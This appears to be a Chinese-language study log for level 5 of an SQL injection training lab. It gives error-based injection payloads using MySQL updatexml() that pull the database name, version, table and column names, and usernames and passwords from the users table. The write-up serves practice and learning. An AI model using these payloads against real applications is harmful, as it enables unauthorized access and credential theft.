sqli靶场学习记录-第五关

打开第五关，发现和前面四关有区别，他没有显示字段，无论怎么更换id页面都没有变化

更换了id输入的内容如id=1" id=1") 发现页面没有变化

但是输入id='和id=')页面发生了改变，出现了报错信息

那么通过报错信息的回显就可以开始注入了

1、updatexml()函数

1' and updatexml(1,concat('$',database()),1)-- qq

 updatexml()函数具体的作用是构造一个错误的语法，updatexml里面的三个参数第一个和第三个并不重要，但要存在一个错误的信息让服务器产生报错信息，然后在第二个参数构造一个正确的查询语句，在回显报错信息的时候会将查询到的信息回显出来。

构造语句的时候用concat把$和查询语句查询到的信息结合起来打印，$后面就是我们想要的信息

2、查询数据库的版本

1' and updatexml(1,concat('$',mid(version(),1,20),'$'),1)-- qq

 这里数据库的版本号没有显示完全，没有找到很好的解决方法，后续找到解决方法再更新

更新：

试过了用0x3a连接显示是正常的(0x3a是:的16进制表示),但是$连接就会存在显示问题，把$转成16进制表示显示一样存在问题

3、爆表

1' and updatexml(1,concat('$',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'$'),1)-- qq

在5.0版本以上的mysql内自带的information_schema表查询当前数据库下的所有表名，通过limit逐一显示

也可以用mid（）函数将像要的内容按照自己想要的数量展现出来

1' and updatexml(1,concat('$',mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,30),'$'),1)-- qq

4、 爆字段名

1' and updatexml(1,concat('$',(select column_name from information_schema.columns where table_name='users' limit 0,1),'$'),1)-- qq

5、数据查询

拿到数据库名、表名、字段名就可以在数据库内查询想要的内容了

1' and updatexml(1,concat('$',(select username from users limit 1,1),'$',(select password from users limit 1,1),'$'),1)-- qq

还是使用的limit逐一查询，也可以用mid函数一次性列出

@-@